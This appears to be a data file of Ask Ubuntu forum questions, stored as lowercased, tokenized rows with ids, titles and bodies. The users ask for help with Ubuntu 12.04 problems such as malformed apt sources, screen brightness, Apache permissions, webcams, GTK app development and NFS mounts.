154942	why is update manager giving me `malformed line ' errors ?	i 'm using ubuntu now for almost one year , but i 'm not too much of a programmer . lately i got problems with updating everything , the software manager refuses to search for updates and gives me responses like : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the update-manager package and include the following error message : e : malformed line 52 in source list /etc/apt/sources.list ( absolute dist ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . does anybody can help me ? just want to update to 12.04 and get it working again . thanks in advance patrick ok , this is what i get by entering gksudo gedit /etc/apt/sources.list into the terminal : deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb htp : //archive.ubuntu.com/ubuntu oneiric main restricted deb-src htp : //archive.ubuntu.com/ubuntu oneiric restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb htp : //archive.ubuntu.com/ubuntu oneiric-updates main restricted deb-src htp : //archive.ubuntu.com/ubuntu oneiric-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb htp : //archive.ubuntu.com/ubuntu oneiric universe deb htp : //archive.ubuntu.com/ubuntu oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb htp : //archive.ubuntu.com/ubuntu oneiric multiverse deb htp : //archive.ubuntu.com/ubuntu oneiric-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb htp : //archive.ubuntu.com/ubuntu oneiric-backports main restricted universe multiverse deb-src htp : //archive.ubuntu.com/ubuntu oneiric-backports main restricted universe multiverse # added by software-properties deb htp : //archive.ubuntu.com/ubuntu oneiric-security main restricted deb-src htp : //archive.ubuntu.com/ubuntu oneiric-security restricted main multiverse universe # added by software-properties deb htp : //archive.ubuntu.com/ubuntu oneiric-security universe deb htp : //archive.ubuntu.com/ubuntu oneiric-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb htp : //archive.canonical.com/ubuntu oneiric partner deb-src htp : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb htp : //extras.ubuntu.com/ubuntu oneiric main deb-src htp : //extras.ubuntu.com/ubuntu oneiric main deb htp : //archive.canonical.com / natty partner deb-src htp : //archive.canonical.com / natty partner deb htp : //archive.ubuntu.com/ubuntu oneiric-proposed restricted main multiverse universe hope that helps . ok guys , i just deleted some lines in the above postet text by trial and error . it 's working not again , but do n't ask why it 's working now again . i 'm happy it works , but could anybody explain to me , why ? i just deleted line : deb-src htp : //archive.canonical.com / natty partner just want to at least try to understand a bit of my computer and what it does .
154948	unable to change brightness on a toshiba l750	so , as a number of users seem to be experiencing , i am unable to change brightness on my laptop . using the brightness and lock in settings , the slider moves but brightness does not adjust . the fn keys work for volume but not for brightness . i have updated my drivers and installed all updates , however the brightness is still at maximum . i have heard that opening sudo gedit /etc/x11/xorg.conf and entering option `` registrydwords '' `` enablebrightnesscontrol=1 '' can fix this , however when opening xorg.conf through terminal i am greeted with a blank document ... not very reassuring . toshiba l750 laptop nvidia graphics card dual boot with windows
154949	why do i get a 403 error when accessing my apache server ?	im running ubuntu 12.04 lts on a system with 2 gb ram and a 500 gb hdd . my hard drive has 4 partitions : partition 1 = 40 gb windows ( ntfs , lable = win32 ) partition 2 = 320 gb windows ( fat label = common ) partition 3 = 40 gb ubuntu ( ext4 ) i installed apached2 . then , to change its default www directory , i ran gksu gedit /etc/apache2/sites-enabled/000-default and , in the editor , changed the location to /media/common/www . after that i ran these commands in a terminal : chmod 777 /media/common/www chmod 777 /media/common/www/* . * after that i ran : firefox 127.0.0.1/index.php it said : forbidden you do n't have permission to access / on this server . apache/2.2.22 ( ubuntu ) server at 127.0.0.1 port 80 before my changes it was working fine . how can i run my websites ?
154953	specify jdk for tomcat7	i have installed tomcat7 ( using apt-get install ) and whenever i want to start tomcat7 it says : * no jdk found - please set java_home i have set java_home in my bash.bashrc and also in ~/.bashrc and when i issue echo $ java_home i clearly see that this variable is pointing to my jdk 's root folder . can someone help me with this please ? thanks
154954	ubuntu 12.04 - unable to change brightness [ ati hd xxxx - toshiba satellite l510 19e ]	i ca n't change my brighness . on my ubuntu is the original driver from ati.com running . i used ubuntu 12.4 with the lastest updates . can everyone help me ? thanks guys ! my xorg.conf : section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
154956	open source alternatives to pd- proxy premium	i 'm looking for a good program that can rival the features provided by pd- proxy which are advertised as : a premium user can choose multiple servers located in different locations around the world . connection will not restart every hour unlimited bandwidth any free linux apps ? thanks in advance
154957	how to uninstall ubuntu from an ubuntu only system	an alternative title for this is : `` how do i reinstall windows xp onto an ubuntu only netbook '' i installed ubuntu 12.4 by wiping windows and not creating another partition for ubuntu in the hard drive . i realize that , this was a mistake . i have tried repartitioning using various tools , so that i can run windows alongside ubuntu , using my copy of windows from another pc , but it has all become too complex . i love ubuntu , wish i could keep it on its own , but i am tired of trying because , i need windows for work related things . in particular , i have to instal my `` wacom intuos graphics tablet '' with a serial port , but this appears too technical to me to achieve that in ubuntu . i think i now have to first remove ubuntu , reinstall windows and then , reinstall ubuntu by partitioning it properly , as i was advised to begin with . i would appreciate any answers very much , but i need answers in plain english unfortunately , because i do not understand much of the abbreviations used in ubuntu forums . i should add that my treasured ubuntu system is on an hpmini netbook , so it all has to be done with usb 's . which does complicate things . sorri : /
154961	ca n't add page in a notebook	i am having some trouble adding a page to a notebook widget . the error i get is this : attributeerror : 'function ' object has no attribute 'append_page' i assume this means the object pages in the following code has not been set to a gtk.notebook class . def add_page ( self , pages ) : textview = gtk.textview ( ) textbuffer = textview.get_buffer ( ) textbuffer.set_text ( `` '' ) pages.append_page ( textview , gtk.label ( `` new page '' ) ) the code that calls that is : def on_btn_new_page_activate ( self , widget ) : self.add_page ( self.get_pages ) the method get_pages ( ) is following ( probably where the problem is ) : def get_pages ( self ) : subjectnum = self.subjects.get_current_page ( ) pages = self.subject.get_nth_page ( subjectnum ) return pages the subjects variable is a valid notebook fetched by the following : self.subjects = self.builder.get_object ( `` subjects '' ) thanks . edit : now the following error occurs : traceback ( most recent call last ) : file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 100 , in on_btn_new_page_activate self.add_page ( self.get_pages ( ) ) file `` /home/nja/notetaker/notetaker/notetakerwindow.py '' , line 73 , in get_pages pages = self.subject.get_nth_page ( subjectnum ) attributeerror : 'notetakerwindow ' object has no attribute 'subject'
154963	ubuntu can not detect my logitech wireless m510 mouse ?	i have my mouse plugged in but it does n't have drivers so it does n't work . how do i find the drivers ? please give me a link or tell me how to detect them from ubuntu software ?
154970	systray disappeared	running ubuntu 12.04 - all well after installation - looking for some options in compiz do organize expo and other desktop stuff , now systray-panel ( = program-menus cant be shown and icons unvisible and no logoff , ... ) is not drawn at the top of screen/desktops the launcher at left doesnt appear while moving mouse to then left any programs can only be started via command-line by getting a terminal with ctrl-alt-t how can i start/show it again ?
154973	is it possible to start an additional x server after the system boots in 12.04 ?	i 'd like to have 2 vt 's running , one on vt7 with the standard lightdm + unity interface and another on vt8 running a custom script which will launch a virtual machine in full screen . at the moment i 've tried writing an init.d script with no luck and i ca n't find any details on a configuration file which will allow me to start 2 servers . i suppose my ideal answer would be one which points me to a config file i can edit to start up an additional server . edit - i forgot to mention in the text that i already know how to start another x session : i 'd like this to start automatically at boot .
154975	how to deinstall top panel or allow programs/windows to be ontop of that panel	as the title says . the problem is my screen size is 1080p , and i need a program to run in 1080p in window mode , but the top panel is forcing the programwindow out of the screen how to fix that . or deinstall the top panel . thanks in advance !
154982	gtk3 tabs with big icons	i want to implement something similar to the ubuntu software center 's tabs . what widget is it ? any working example in python where i could take a look ? is this widget available in glade ? thanks in advance .
154985	ca n't hear any music in psychonauts ( humble indie bundle v )	i bought humble indie bundle v and psychonauts has no music . i mean , i can hear the sound effects and the characters ' voices , but there is no music in any of the levels where i know it should be playing . i 've tried changing the setting in the audio menu but that did n't work ... i installed the graphics drivers for my ati radeon hd 4830 through the additional drivers menu and also the landscape sometimes seems to be flickering whenever i am outside ( only the grass ) . i am running ubuntu 12.04 lts .
154989	how do i add spellcheck to a textview object in my quickly app ?	specifically for a quickly app , using gtk3 : how do you import gtkspell in python ? how do you set it up to spell-check a textview object ? ( if there 's an alternative to gtkspell , do tell . )
154991	how do i upgrade to ubuntu 12.04 lts or greater ?	when i press upgrade button on upgrade center it starts downloading and suddenly stops and shows message stating authentication failed and advises to check network connection even if it is connected . please help me out of this problem .
154993	how are games launched	i have downloaded programs from the ubuntu software center , the only ones i ca n't find are the games . it says i have them , but i ca n't launch them . where do i look for them ?
154998	dell m4600 with nvidia quadro 2000m hangs on boot when external monitor is connected	i have a problem with my fresh installed ubuntu 12.04 lts on my dell m4600 : nvidia quadro 2000m i7-2860 16gb ram 128gb ssd dell/samsung 750gb hdd ips rgb laptop display when it is connected via dp++ to the external dell u2311h monitor , it hangs on boot or when wakening from suspend . if i detach the dp cable it boots normally . i have tried all combinations that i have found , as adding to grub : '' no splash '' , `` boot=pci '' , `` acpi=off '' , etc ... i have also changed in nvidia x settings that external monitor is the primary one and also tried to delete monitor.xml file . there is no change it hangs each time after grub . it starts to load daemons then both screens are blank and then completely hangs with beep sound . what i discovered is if i detach the cable and wait for about 2 sec after grub starts booting and then physically connect dp cable while the ubuntu is still booting everything works normally and i have a picture on my external screen while the laptop screen is off , just as i wanted . do you maybe know how to solve this issue ? thank you .
155002	webcam on xps m1530 does n't work with 12.04	i have a dell xps m1530 that originally came with ubuntu ( back in 2006 or so ) . the webcam has always worked out of the box in cheese , skype , etc . i do n't use it regularly , but i had tested it before . i recently tried it after upgrading to ubuntu 12.04 , and i 'm getting a black screen in every application i try . ( the blue webcam light does go on , i just do n't get any video . ) here 's what i 've figured out : this is my webcam as reported by lsusb : bus 003 device 003 : id 05a9:2640 omnivision technologies , inc. ov2640 webcam it should be supported by the uvc drivers : http : //www.ideasonboard.org/uvc/ # devices in all applications tested , the blue light turns on but the video is black . cheese output : libv4l2 : error got 4 consecutive frame decode errors , last error : v4l-convert : libjpeg error : end of image libv4l2 : error got 4 consecutive frame decode errors , last error : v4l-convert : libjpeg error : end of image libv4l2 : error got 4 consecutive frame decode errors , last error : v4l-convert : libjpeg error : end of image libv4l2 : error got 4 consecutive frame decode errors , last error : v4l-convert : libjpeg error : end of image libv4l2 : error got 4 consecutive frame decode errors , last error : v4l-convert : libjpeg error : end of image guvcview output : guvcview 1.5.3 alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started video device : /dev/video0 init . laptop integrated webcam ( location : usb-0000:00:1a.0-1 ) { pixelformat = 'mjpg ' , description = 'mjpeg ' } { discrete : width = 160 , height = 120 } time interval between frame : 2/15 , { pixelformat = 'rgb3 ' , description = 'rgb3 ' } { discrete : width = 160 , height = 120 } time interval between frame : 2/15 , { pixelformat = 'bgr3 ' , description = 'bgr3 ' } { discrete : width = 160 , height = 120 } time interval between frame : 2/15 , { pixelformat = 'yu12 ' , description = 'yu12 ' } { discrete : width = 160 , height = 120 } time interval between frame : 2/15 , { pixelformat = 'yv12 ' , description = 'yv12 ' } { discrete : width = 160 , height = 120 } time interval between frame : 2/15 , vid:05a9 pid:2640 driver : uvcvideo checking format : 1196444237 vidioc_g_comp : : invalid argument compression control not supported fps is set to 2/15 drawing controls fps is set to 2/15 no codec detected for h264 no codec detected for mp3 - ( lavc ) checking video mode 160x120 @ 32bpp : ok could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable ignoring empty buffer ... could not grab image ( select timeout ) : resource temporarily unavailable ignoring empty buffer ... could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable ignoring empty buffer ... could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable ignoring empty buffer ... could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable skype output ( one error appeared each time i disabled video . no error when enabling video , but , of course , just a black screen and blue light . $ ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l2convert.so skype libv4l2 : error dequeuing buf : invalid argument libv4l2 : error allocating conversion buffer libv4l2 : error allocating conversion buffer libv4l2 : error allocating conversion buffer libv4l2 : error allocating conversion buffer any thoughts ?
155005	block ping from a specific ip	i am on a private lan 192.168.1.0/24 . my ip is 192.168.1.3 , i want to block only ping requests from 192.168.1.2 . i am running ubuntu 11.10 . i found two links first tells how to block an ip but not how to block only ping requests . second tells how to disable ping all together . can someone please tell me how to block only ping requests from a specific ip
155006	ubuntu boot menu options	how to get the boot menu option where you can choose the recovery or the latest version of kernel ? it helped me in the past to boot into a recovery mode if things went wrong !
155011	problem with install su jdk-7u1 in ubuntu	i finished some steps of installation of jdk-7u1 in ubuntu 1.11 until below steps . after that step the terminal tells that there is nothing to configure . after that when i run a java file the terminal said that usr/lib/jvm/java : no such a file or directory . sudo update-alternatives -- install `` /usr/bin/java '' `` java '' `` /usr/lib/jvm/jdk1.7.0/bin/java '' 1 sudo update-alternatives -- install `` /usr/bin/javac '' `` javac '' `` /usr/lib/jvm/jdk1.7.0/bin/javac '' 1 sudo update-alternatives -- install `` /usr/bin/javaws '' `` javaws '' `` /usr/lib/jvm/jdk1.7
155013	how do i get the webcam on a dell inspiron 14n 4050 working ?	i am using dell inspiron 14 n 4050 which is equipd with a hd video webcam . the webcam is not detected nether working by os e.e . ubuntu 10 . please any body help me out of this problem .
155015	why is wubi giving me an error message when i try to install ?	i am currently using windows xp , and i hate windows and am trying to install ubuntu . i have the proper files on a usb and i have downloaded wubi , yet wubi keeps giving me an error message . how do i fix wubi ? the error was error : 'none type ' object has no attribute 'get_info wubi also disappeared after the error ; that , or i just can not find it easily .
155019	installing dgen removes ubuntu-desktop	i am trying to install `` dgen '' a sega megadrive/genesis emulator , available in the official ubuntu repositories . but when i try to install , the package manager ( usc or even apt-get ) , say 's that he needs to remove those packages before installing : file-roller lintian ubuntu-desktop unzip winetricks so , how can i install this package without removing those packages ? and do i need to fill a bug report for this ?
155025	dual monitor windows and ubuntu	i have the following setup on my home . i would like to be able to use the ubuntu on dual-screen mode while my windows machine is on idle . i am looking for the best way to set this up ... 1 ) each monitor has both agp and dvi connections . only pc1 has to different outputs for the videocard 2 ) i can connect the ubuntu pc to the second monitor using dvi cable and agp to dvi cable . my questions are : 1 ) how do i set this up on the ubuntu machine ? 2 ) can i set a hot-key to quickly disable the dual-mode and be able to see my windows machine again ? thank you ! image : http : //i.stack.imgur.com/vvj0r.png
155032	unable to mount webdav , no error messages	i ' trying to mount a webdav service in nautilus on ubuntu 12.04 . i originally had crash errors with tracker-miner-fs , but after updating to most resent build any attempt to connect still leaves me with a connecting message and no errors . i 've let it sit for in excess of 15 min and it never connects and never gives an error message . what am i missing here ?
155041	bridging : loosing wlan network connection with 4addr on option - why ?	question : for use with my xen vm , i need to create a virtual network interface ( vif ) that is bridged to wlan0 . if in /etc/network/interfaces i add auto xenbr0 iface xenbr0 inet dhcp and then later do brctl addif xenbr0 wlan0 i get this error message . ca n't add wlan0 to bridge xenbr0 : operation not supported i found out that linux wo n't let you bridge a wireless interface in managed mode at all unless you enable the 4addr option ( needed to recompile iw ) : iw dev wlan0 set 4addr on afterwards brctl addif xenbr0 wlan0 works , and brctl show shows xenbr0 as bridged to wlan0 . unfortunately , as soon as i execute iw dev wlan0 set 4addr on my entire network connection is gone ( no connection ) . as soon as then i execute iw dev wlan0 set 4addr off i reconnect and it works again . if i re-execute 4addr on , it breaks again , if i execute 4addr off , it works again . unfortunately , i ca n't just turn 4addr on , activate the bridge and then turn it back off ( error : device not ready ) . does anybody know why i loose my connection ?
155042	how i can run android 4.0.4 in chroot on ubuntu 12.04 on the pandaboard es ?	i want to run fully functional android 4.0.4 on my ubuntu 12.04 installation on the pandaboard es with the lxc containers .
155043	how can i repair the default gtk libraries after installing gtk 3.4 from source ?	i am running ubuntu 12.04 and compiled and installed gtk 3.4 to go through some gtk developer tutorials . installing this version of gtk has caused problems with unity . all system dialogs and top bar now have a different ( older ) look , and when i try to launch nautilus i get the following message : gtk-message : failed to load module `` canberra-gtk-module '' initializing nautilus-open-terminal extension initializing nautilus-dropbox 1.4.0 initializing nautilus-gdu extension nautilus : symbol lookup error : nautilus : undefined symbol : ubuntu_menu_proxy_get i have run make uninstall on the newer version of gtk and reinstalled just about every package i can think of , but i am still having the same problem . how can i repair the default ubuntu gtk libraries ? edit also , i noticed that my desktop icons are gone ( launcher works ) , and i ca n't interact with the desktop . i ca n't drag any shortcuts to it , etc .
155045	how do i show an animated gif in the app i am developing ?	i am developing discvur , a simple imgur viewer , for the ubuntu app showdown . therefore i use quickly + glade + gtk + python . pygobject instead of pygtk would be highly appreciated . i would like to display some animated gifs in my program . what i tried was inserting a viewport , then an image , and then in the 'edit image ' field i selected a gif animation ( in my case `` ../media/ako1i.gif '' ) . when i run my app , the gif is displayed but it is not moving ( i only see the first frame ) . is it possible to show animated gifs in my app ? what is the best and/or easiest way to do it : use the image widget , or a webkit field , or something else ?
155046	universe and multiverse software sites for ubuntu 12.04 lts	how do i reach the sites of universe and multiverse softwares for ubuntu free software ?
155051	error : hd0 out of disk grub rescue	my laptop asus eee pc 1001 px fell down and can not boot anymore . i was on ubuntu 12.04 . here is what happen on start up 1/ a slight noise for the hard drive 2/ then the screen display the following error : hd0 out of disk . grub rescue > by typing ls : ( hd0 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) by typing set : prefix= ( hd0 , msdos1 ) /boot/grub root=hd0 , msdos1 i can not access further in the files with say ls ( hd0 , msdos6 ) ... answering unknown filesystem neither can i boot from a live version of ubuntu with a usb stick saying there is no bootable device even by disabling all other disks but the usb stick . and sudo command is unknown . i am afraid hd may be broken but in case there is any clues , helps or solutions to boot or at least save datas you 're welcome . thanks
155056	64 bit ubuntu installation fails dell xps | 15z	i tried to install 64 bit ubuntu desktop to the machine i stated above . when i try to do so by cd , the screen freezes , and when i try to do so using usb drive , the screen freezes again just after the line : [ firmware bug ] acpi ( pegp ) defines _dod but not _dos is there anyway i can overcome this problem ? ps : installation procedure starts and works fine on other machines using the same cd and usb drive
155058	how to configure idle period for auto locking screen	i just installed a fresh ubuntu 12.04 ( precise pangolin ) . i noticed that , there is no screensaver settings , which is fine . i like to control the period of time after which the blank screen is shown , which automatically locks the screen . i do not want to enable screensaver . i only wish to be able to change the idle time period required to lock the screen automatically . it seems to me , it is by default around 10-15 minutes .
155061	problems related with spin buttons	so , i have an important problem related with spin buttons in python/gtk3 . i 'm trying to create a spin button in my project , virtuam , and it seems to work ... but with a bug which blocks the +/- toogles . also , strangely , i can manually change the spin box value ... : / i 've installed it in a virtual machine , and it haves the same problem . it worked well before , and if i try to remove the source and download a commit which worked , i still have problems . what should i do ? is it a gtk bug , or it 's my fault ? in the last case , what 's wrong : the script ( vui.py ) or the interface ( assistant.glade ) ? you can download the latest commit at lp : virtuam/trunk
155069	package operation failed when updating 12.04	whenever i try to update 12.04 , i get the `` package operation failed '' message . i have n't been able to update my system . in the `` details '' section it says : installarchives ( ) failed : extracting templates from packages : 30 % % extracting templates from packages : 61 % % extracting templates from packages : 91 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 30 % % extracting templates from packages : 61 % % extracting templates from packages : 91 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 30 % % extracting templates from packages : 61 % % extracting templates from packages : 91 % % extracting templates from packages : 100 % % preconfiguring packages ... extracting templates from packages : 30 % % extracting templates from packages : 61 % % extracting templates from packages : 91 % % extracting templates from packages : 100 % % preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/available ' near line 42150 package 'x11-apps ' : blank line in value of field 'description ' error in function :
155077	how do i get the size of a gtk widget ?	i am developing an app using quickly + glade + gtk + python . i would have liked to know the size of a displayed widget . here is what i wrote already : from gi.repository import gtk , webkit [ … ] self.webview = webkit.webview ( ) [ … ] print self.webview.size_request ( ) i had expected a tuple in the form of ( 100px , 200px ) for example . but what i get instead is < gtkrequisition at 0x24607c0 > . why is that ? what should i do instead ? it seems that the answer is here , but i unfortunately do n't understand it .
155078	do i need driver for a network printer ?	i think i should n't need a driver for a network printer , other than a software help scanning the printer ip on the network ; as long as i know the ip , then all printer should share the same interface . is that correct ? edit : i 'm having an eziprinter
155080	ubuntu wo n't get further than plain screen after booting	i downloaded version 12.04 and have tried to boot it using the wubi . it opens a plain screen with the word ubuntu and five dots under it which change colour a couple of times . then nothing . all i can do is restart - but the same happens . i 'm using a dell inspiron 1300 with windows xp also on it . i 've looked at other similar problems which may be due to the same cause but have no idea how to use command prompts etc to attempt a fix . should i give up on ubuntu ?
155082	how can i determine the size of an image from the command line ?	i have an image called zeakr.jpg . how can i know its size and format from the command line ?
155087	how do i ensure an nfs share stays mounted ?	i have a machine that mounts another machine 's nfs share . however the client machine boots up faster than the server , so it gets an error when trying to mount the nfs share from the server . i had a power outage over the weekend and this can be annoying when i am remote . i would like to ensure that the nfs share is always mounted , so that if the client detects that the share is n't there it will attempt to remount it . i think this might involve autofs and/or upstart to ensure the share stays mounted , but i do n't know how to do this . i am mounting it via the following method in /etc/fstab : jillybean.local : /share /share nfs rsize=32768 , rw , soft , intr
155088	fatal error : avr/io.h : no such file or directory compilation terminated	how to load avr/io.h header files in the gcc compiler..im using 12.04 version of ubuntu.. wen ever i run a avr program this kind of error is generating `` fatal error : avr/io.h : no such file or directory . compilation terminated . '' pl help me out
155090	in development based on quickly , why do codes start with `` from gi.repository import gtk '' ?	i am developing apps in quickly . default codes start with from gi.repository import gtk . why is it so and not simply import gtk for example ? the point is , a lot of tutorials , documentation and forums answers on the web are based on the second importation , as far as i have seen .
155094	ubuntu 12.04 does not suspend with proprietary driver for radeon 6800	i 'm running ubuntu 12.04 x86_64 ( though these issues have existed in previous releases too ) and have a radeon 6800 graphics card . i 've run into issues with the open-source driver ( the system would randomly hang when shutting down ) so i switched to the proprietary driver ( i compiled it myself using these instructions ) , but i am having new problems now . the main issue is that when i go into sleep mode , about 50-75 % of the time , the screen goes black but the monitor does not actually shut off , and i can hear that the fans/hard drive are not suspending either . i ca n't get the computer to wake up ( ctrl+alt+f1,2,3 , etc . does not work ) , and i always end up force shutting down with the power button . i 'd really appreciate help ! here is some information that might be helpful : $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6800 series opengl version string : 4.2.11631 compatibility profile context $ dmesg | grep fglrx [ ... ] [ 6.718606 ] [ fglrx ] module loaded - fglrx 8.96.4 [ apr 5 2012 ] with 1 minors [ ... ]
155097	merge multiple documents and convert to one pdf in libreoffice from terminal	in my ubuntu server 12.04 , i am converting all .docx files under a directory to .pdf files with this command : libreoffice -headless -convert-to pdf : writer_pdf_export *.docx can i merge multiple documents and convert them to single .pdf file like this ? for example : file1.docx file2.docx file3.docx and the output should be one .pdf file like merged_result.pdf . i have to do it from terminal because i 'm using it in php . furthermore , can i add picture like front image ? any kind of source i can get the terminal functions for libreoffice is appreciated , too ; i was unable to find what i 'm looking for . thanks in advance .
155104	centrino wireless-n 1000 takes forever to connect and keeps asking for password	a few days ago i started having this problem . when i tried to connect to any wifi connection it would stay connecting forever , and after a minute or so it would ask me for the password again . the strange thing is that this happened out of nowhere , i did not install any new drivers or anything like that . after this happened i decided to uninstall ubuntu and install it again ( `` inside windows '' ) but the problem is still there . any suggestions would be greatly appreciated . 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 06 serial : 2c:27 : d7 : aa : e4:7d size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:50 ioport:4000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:0d:00.0 logical name : wlan0 version : 00 serial : 00:1e:64:09:9c:58 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-23-generic-pae firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:52 memory : c4500000-c4501fff *-network description : ethernet interface physical id : 1 bus info : usb @ 2:1.2 logical name : eth1 serial : ee:85:2f:7d:80:96 capabilities : ethernet physical configuration : broadcast=yes driver=ipheth ip=172.20.10.2 link=yes multicast=yes i tried both lines to disable n networking but it did n't work for me : wireless with wep extremely slow on an acer timeline 4810t with a centrino wireless-n 1000
155105	why does my computer specify me as `` not the owner '' ?	every time i want to paste or add a file to the root folder it says i 'm not the owner and i do n't have the privlidges of putting it there . it makes me really mad .
155106	how to install pear linux 's shell in ubuntu ?	for people who does n't know what pear linux is : pear linux is a french ubuntu-based desktop linux distribution . some of its features include ease-of-use , custom user interface with a mac os x-style dockbar , and out-of-the-box support for many popular multimedia codecs . excerpt from distrowatch . when this linux distribution came out , i immediately went to the website and found out that pear linux is actually mac osx with a pear . i was going to download it and install pear linux as a triple-boot on my computer ( windows and ubuntu installed ) . then i remembered that pear linux is ubuntu based . so i thought of a better idea of installing only the comice os shell in ubuntu ( the desktop environment of pear linux ) , so that i can select that in the login screen . is that possible ? edit : found this .
155108	bastion main menu invisible	i 'm using ubuntu 12.04 . when i try to play bastion , i ran into a problem . the screen shows the warner bros logo , then supergiant games , and then the music starts and the cursor appears , then nothing showed up . i moved the cursor around and it makes click-clack noises as it moves over what i 'm guessing are tiles on the menu , so it seems the menu is there , just invisible .
155115	unable to install software or update ubuntu 12.04	i receive the following error and update or installs fail . installarchives ( ) failed : dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 : field name `../../../../../share/pyshared/ubuntutweak/policykit/dbusproxy.py ' must be followed by colon
155117	why does thunderbird inform that i get 3 new messages when i only get 1	that happens only when receiving messages from stack exchange , and what 's the reason i did n't have stack exchange account anymore though i just created it yesterday , i had to create it again and again thunderbird started to inform that i got 3 new messages when clearly i got only 1 . something messed up at the stack exchange ?
155119	how to use sublime text 2 as quickly default editor ?	i used this answer to change the editor used with quickly and it worked , however now , when i type quickly edit the command line stays on the open and does not allow me to enter other commands as long as sublime text 2 is open . i realise this is a daft question , but i ca n't seem to find a way to get around it .
